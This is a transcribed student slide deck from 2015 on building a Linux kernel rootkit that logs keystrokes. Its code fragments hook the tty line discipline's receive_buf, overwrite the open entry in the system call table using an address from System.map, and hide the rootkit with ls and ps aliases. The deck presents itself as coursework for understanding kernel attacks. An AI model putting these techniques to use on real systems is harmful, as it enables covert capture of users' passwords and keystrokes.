Linux Kernel Rootkit : Virtual Terminal Key Logger



Similar documents
Rootkit: Analysis, Detection and Protection

Traditional Rootkits Lrk4 & KNARK

Operating System Structure

Analysis of the Linux Audit System 1

Linux LKM Firewall v 0.95 (2/5/2010)

VICE Catch the hookers! (Plus new rootkit techniques) Jamie Butler Greg Hoglund

Kernel Intrusion Detection System

Worms, Trojan Horses and Root Kits

NEW CRIMINAL POTENTIAL ANDROID ROOTKIT

Soft-Timer Driven Transient Kernel Control Flow Attacks and Defense

Toasterkit - A NetBSD Rootkit. Anthony Martinez Thomas Bowen

Assignment 5: Adding and testing a new system call to Linux kernel

Linux Driver Devices. Why, When, Which, How?

Detecting Kernel-Level Rootkits Through Binary Analysis

User-level processes (clients) request services from the kernel (server) via special protected procedure calls

Networks. Inter-process Communication. Pipes. Inter-process Communication

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com

For a 64-bit system. I - Presentation Of The Shellcode

Linux Firewall Lab. 1 Overview. 2 Lab Tasks. 2.1 Task 1: Firewall Policies. Laboratory for Computer Security Education 1

Server Forensics: Linux

REAL TIME OPERATING SYSTEM PROGRAMMING-II: II: Windows CE, OSEK and Real time Linux. Lesson-12: Real Time Linux

Last Class: OS and Computer Architecture. Last Class: OS and Computer Architecture

Virtual Machine Security

Operating Systems and Networks

W4118 Operating Systems. Junfeng Yang

Abstract. 1. Introduction. 2. Threat Model

PuttyRider. With great power comes great responsibility. # Pivoting from Windows to Linux in a penetration test. Adrian Furtunã, PhD adif2k8@gmail.

VMM-based Approach to Detecting Stealthy Keyloggers. Kenji KONO Keio Univ.

System Calls and Standard I/O

Unix/Linux Forensics 1

Project No. 2: Process Scheduling in Linux Submission due: April 28, 2014, 11:59pm

Lab 6: Building Your Own Firewall

Linux Kernel Architecture

Hacking Database for Owning your Data

CSE331: Introduction to Networks and Security. Lecture 32 Fall 2004

590.7 Network Security Lecture 2: Goals and Challenges of Security Engineering. Xiaowei Yang

Audit Trail Administration

The Value of Physical Memory for Incident Response

(General purpose) Program security. What does it mean for a pgm to be secure? Depends whom you ask. Takes a long time to break its security controls.

Minix Mini Unix (Minix) basically, a UNIX - compatible operating system. Minix is small in size, with microkernel-based design. Minix has been kept

Cosmic Board for phycore AM335x System on Module and Carrier Board. Application Development User Manual

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Subverting the Xen hypervisor

SMTP-32 Library. Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows. Version 5.2

Operating Systems Project: Device Drivers

Network Threats and Vulnerabilities. Ed Crowley

Forensic analysis of a Linux web server

Keystroke Encryption Technology Explained

Cisco Networking Academy Program Curriculum Scope & Sequence. Fundamentals of UNIX version 2.0 (July, 2002)

Security: Attack and Defense

CS161: Operating Systems

Twitter and Notifications of Linux Server Events

Implementation and Implications of a Stealth Hard-Drive Backdoor

Threat Events: Software Attacks (cont.)

COS 217: Introduction to Programming Systems

Software security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security

Bypassing firewalls Another hole in the wall ;-) Présentation pour «La nuit du hack» le 13 Juin 2009

Hacking. The Edge Pieces. Ken Gottry May Ken Gottry

CS 103 Lab Linux and Virtual Machines

System Calls Related to File Manipulation

Security Overview of the Integrity Virtual Machines Architecture

Kernel. What is an Operating System? Systems Software and Application Software. The core of an OS is called kernel, which. Module 9: Operating Systems

Green Telnet. Making the Client/Server Model Green

Prof. Christos Xenakis, Dr. Christoforos Ntantogian Department of Digital Systems University of Piraeus, Greece

Pentesting Mobile Applications

Networking Operating Systems (CO32010)

Virtual Servers. Virtual machines. Virtualization. Design of IBM s VM. Virtual machine systems can give everyone the OS (and hardware) that they want.

Cyber Security In High-Performance Computing Environment Prakashan Korambath Institute for Digital Research and Education, UCLA July 17, 2014

Attacking Host Intrusion Prevention Systems. Eugene Tsyrklevich

Keylogging Identity The Defense System TM. Whitepaper. Legal Club of America 7771 W. Oakland Park Blvd. #217 Sunrise, Florida

Operating Systems Design 16. Networking: Sockets

DDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest

Xen and XenServer Storage Performance

Security types to the rescue

µtasker Document FTP Client

USB 2.0 Flash Drive User Manual

Operating System Structures

A Virtual Machine Introspection Based Architecture for Intrusion Detection

ADVANCED MAC OS X ROOTKITS

Design of a secure system. Example: trusted OS. Bell-La Pdula Model. Evaluation: the orange book. Buffer Overflow Attacks

Exceptions in MIPS. know the exception mechanism in MIPS be able to write a simple exception handler for a MIPS machine

Arduino Internet Connectivity: Maintenance Manual Julian Ryan Draft No. 7 April 24, 2015

Application-Level Debugging and Profiling: Gaps in the Tool Ecosystem. Dr Rosemary Francis, Ellexus

Shared Memory Segments and POSIX Semaphores 1

Rootkit Detection on Virtual Machines through Deep Information Extraction at Hypervisor-level

CSE543 - Introduction to Computer and Network Security. Module: Operating System Security

EECS 354 Network Security. Introduction

Redline Users Guide. Version 1.12

Operating Systems. Notice that, before you can run programs that you write in JavaScript, you need to jump through a few hoops first

Device Management Functions

Red Hat Linux Internals

Windows servers. NT networks

Embedded Programming in C/C++: Lesson-1: Programming Elements and Programming in C

Network packet capture in Linux kernelspace

When you listen to the news, you hear about many different forms of computer infection(s). The most common are:

Course Content: Session 1. Ethics & Hacking

Programmation Systèmes Cours 7 IPC: FIFO

CHAPTER 17: File Management

Intrusion Detection and Threat Vectors Michael Arent EDS-Global Information Security

An Introduction on How to Better Protect Your Computer and Sensitive Data

Transcription:

Linux Kernel Rootkit : Virtual Terminal Key Logger Jeena Kleenankandy Roll No. P140066CS Depatment of Computer Science and Engineering National Institute of Technology Calicut jeena p140066cs@nitc.ac.in April 24, 2015 Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 1 / 17

Overview 1 Objective/Motivation 2 Introduction 3 Terminology 4 Linux TTY Devices 5 Kernel data structures 6 Maintaining Stealth 7 Conclusion & Future Work 8 References Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 2 / 17

Objective / Motivation To gain insight into internel working of kernel, especially TTY drivers and system calls To understand the vulnerabilities in kernel, by taking the role of attacker To develop a root-kit, Terminal key-logger, that targets Linux 2.6 kernel Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 3 / 17

Introduction Linux Kernel Rootkit 1 Attack the tty structure of linux kernel to capture user inputs, both local & remote logins 2 Modify System call table access privelage to hook system calls 3 Print the captured inputs into system log 4 Modify the ps and ls commands to hide the presence of rootkit Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 4 / 17

Some terms & Commands... you already know.. Rootkit A collection of tools that allows a hacker to provide a backdoor into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkits are typically used to capture passwords, though they can be used to collect any priveliged information Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 5 / 17

Some terms & Commands... you already know.. Loadable Kernel Module LKM is an object file that contains code to extend the running kernel of an operating system. They are dynamically linked to the kernel and is powerful as it. insmod Insert an LKM into the kernel. rmmod Remove an LKM from the kernel. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 6 / 17

Some terms & Commands... you already know.. System Call Hooks Hooks work by modifying function pointers to point to a malicious version of a function, by which the attacker can gain complete control of the execution flow of a particular call. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 7 / 17

Linux TTY Devices Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 8 / 17

Kernel data structures struct tty struct An instance of tty struct is created any time a new tty device is opened, and exists until it is last closed # /usr/include/linux/tty.h struct tty_struct { int magic; struct tty_driver driver; struct tty_ldisc ldisc; struct termios *termios, *termios_locked;... } Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 9 / 17

Kernel data structures struct tty ldisc The structure is referenced by the ldisc field of tty struct struct tty_ldisc { struct tty_ldisc_ops *ops; struct tty_struct *tty; }; struct tty_ldisc_ops { void (*receive_buf)(struct tty_struct *, const unsigned char *cp, char *fp, int count); receive buf() function is called by the low-level tty driver to send characters received by the hardware to the line discipline for processing. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 10 / 17

Kernel data structures To log inputs on the tty0 int fd = open("/dev/tty0", O_RDONLY, 0); struct file *file = fget(fd); struct tty_struct *tty = file->private_data; old_receive_buf = tty->ldisc->ops->receive_buf; tty->ldisc->ops->receive_buf = new_receive_buf; tty struct and tty queue structures are dynamically allocated only when the tty is open. We have to intercept sys open syscall to dynamically hooking the receive buf() function of each tty or pty when it s invoked. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 11 / 17

Kernel data structures Our malicious new function void new_receive_buf(struct tty_struct *tty, const unsigned ch char *fp, int count) { //log inputs here... /* call the original receive_buf */ (*old_receive_buf)(tty, cp, fp, count); } cp is a pointer to the buffer of input character received by the device. fp is a pointer to a pointer of flag bytes which indicate whether a character was received with a parity error, etc. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 12 / 17

Kernel data structures To intercept open syscall original_sys_open = sys_call_table[ NR_open]; sys_call_table[ NR_open] = new_sys_open; Oops! Symbol table is no longer exported in Kernel 2.6. To solve this : Get the location of the syscall table from boot/system.map file grep sys call table /boot/system.map sys call table = (void*)0xc0598150; Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 13 / 17

Maintaining Stealth To hide the rootkit, create an alias in the.bashrc file : For ls command, alias ls = ls --ignore=klog For ps command, alias ps = ps > /tmp/temp.txt cat /tmp/temp.txt grep -v klog Not a brilliant idea, but enough to fool a naive user Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 14 / 17

Conclusion & Future Work 1 demonstrates that anyone with a basic knowledge of Linux and C programing, can create simple rootkits. 2 should have written to seperate file instead of using printk 3 enhance to listen for a signal from the attacker and send the hijacked password over the network 4 could be made to hide itself from lsmod command Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 15 / 17

References Ra ul Siles Pel aez(2004) Linux kernel rootkits: protecting the systems Ring - Zero GIAC Unix Security Administrator (GCUX) Subrata Acharya Dr.,Brian Namovicz, Jonathan Wiseman I. (2010). A Hybrid Root-kit for Linux Operating System, Colonial Academic Alliance Research Journal, 1, pp.1 12. Linux Cross Reference : Free electrons, url: http://lxr.freeelectrons.com/, Accessed on 28 March 2015 Writing Linux Kernel Keylogger, Phrack Magazine, Volume 0x0b, Issue 0x3b, Phile 0x0e of 0x12, June 19th, 2002 Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 16 / 17

WORD OF CAUTION Don t ever try this on a real OS, VirtualBoxs are cheaper to crash Thank You Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, 2015 17 / 17

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information